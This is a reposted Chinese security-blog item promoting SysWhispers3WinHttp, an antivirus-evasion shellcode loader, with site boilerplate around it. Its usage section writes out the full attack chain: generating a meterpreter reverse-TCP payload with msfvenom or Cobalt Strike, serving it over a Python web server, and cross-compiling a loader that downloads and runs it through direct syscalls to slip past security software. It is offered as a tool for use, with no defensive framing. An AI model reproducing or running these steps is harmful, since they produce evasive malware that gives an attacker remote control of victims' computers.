Syscall免杀源码

admin 2024年6月23日22:25:22评论3 views字数 756阅读2分31秒阅读模式
0x01 工具介绍

SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,在Linux下使用GCC进行交叉编译
0x02 安装与使用

一、使用方法
// 1. 使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=x.x.x.x lport=4444 -f raw -o beacon.bin// 2. 使用python3开启Web服务(或使用CobaltStrike之HostFile功能)python3 -m http.server// 3. 修改SysWhispers3WinHttp.c第72行IP地址,使用Linux64位GCC进行交叉编译x86_64-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls64.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -lpsapi// ps. 或修改SysWhispers3WinHttp.c第4行头文件为syscalls.h,修改第72行IP地址,使用Linux32位GCC进行交叉编译i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -lpsapi

二、效果展示

Syscall免杀源码

Syscall免杀源码

Syscall免杀源码

Syscall免杀源码

0x03 下载链接

https://github.com/huaigu4ng/SysWhispers3WinHttp

原文始发于微信公众号(网络安全者):Syscall免杀源码(6月21日更新)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月23日22:25:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Syscall免杀源码https://cn-sec.com/archives/2875077.html

发表评论

匿名网友 填写信息